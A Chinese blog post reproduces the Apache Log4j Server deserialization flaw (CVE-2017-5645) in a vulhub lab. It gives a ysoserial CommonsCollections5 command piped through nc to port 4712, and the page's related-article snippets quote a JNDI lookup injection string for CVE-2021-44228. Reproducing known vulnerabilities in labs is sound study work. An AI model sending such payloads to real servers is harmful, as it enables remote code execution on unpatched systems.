vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

最新推荐文章于 2024-07-15 17:34:27 发布
最新推荐文章于 2024-07-15 17:34:27 发布
阅读量648 收藏
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: apache log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136173574
版权

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:


 

余生有个小酒馆
关注
专栏目录
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645
qq_51577576的博客
09-14 1711
[ vulhub漏洞复现篇 ] Apache Log4j Server 反序列化命令执行漏洞 CVE-2017-5645 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本存在安全漏洞。攻击者可利用该漏洞执行任意代码
漏洞复现系列:Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
weixin_54626591的博客
05-16 193
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
CVE-2017-5645Apache Log4j Server 反序列化命令执行漏洞
weixin_45742777的博客
07-19 6152
CVE-2017-5645Apache Log4j Server 反序列化命令执行漏洞
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
最新发布
qq_62056583的博客
07-15 557
复现并分析【CVE-2017-5645Apache Log4j Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境复现漏洞
Apache Log4j Server 反序列化命令执行漏洞
qq_61947585的博客
07-06 391
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本存在安全漏洞。攻击者可利用该漏洞执行任意代码
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
weixin_50341025的博客
04-23 2645
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本存在安全漏洞。攻击者可利用该漏洞执行任意代码漏洞环境 执行如下命令启动漏洞环境 docker-compose up -d 环境启动后,将在4712端口开启一个TCPServer。 说一下,除了使用vulhub的docker镜像搭建环境外,我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer:java -cp "log4j-api-2.8.1.j
利用Vulnhub复现漏洞 - Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
JiangBuLiu的博客
07-12 6130
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/log4j/CVE-2017-5645/ 漏洞原理 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log...
漏洞复现Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645
过期的秋刀鱼
11-04 925
ysoserial是在常见的java库发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行命令。攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。将反弹shell进行。
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
m0_52701599的博客
04-06 3188
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)(漏洞复现详细过程)
Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645复现
thelostworld
04-15 1661
由于最近项目遇到这个漏洞复现学习一下。一、漏洞介绍Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本存在安全漏洞。攻击者可利用该漏洞执行任意代码。二、漏洞环境https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645执行如下命令启动漏洞环境d...
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 1043
log4j 反序列化、远程代码执行漏洞
CVE-2021-44228)Apache log4j 远程命令执行
weixin_45253622的博客
12-19 4083
漏洞简介 Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞CVE-2021-44228)。 Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志。此功能也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用
Java代码审计——apache log4j 远程命令执行CVE-2021-44228)
王嘟嘟的博客
12-13 1915
0x00 前言 反序列化总纲 本来是快乐游戏时间的,但是突然就出来这个洞了= =,当然这个突然用的比较夸张了,修复时间应该是在五天前了。 本着学习的态度来进行一下简单的分析。 0x01 环境 首先是pom <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>lo
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6372
漏洞说明 Log4jApache的开源日志记录组件。Log4j2是Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境的配置。
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 971
CVE-2021-44228
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 362
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志,开始解析{}的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值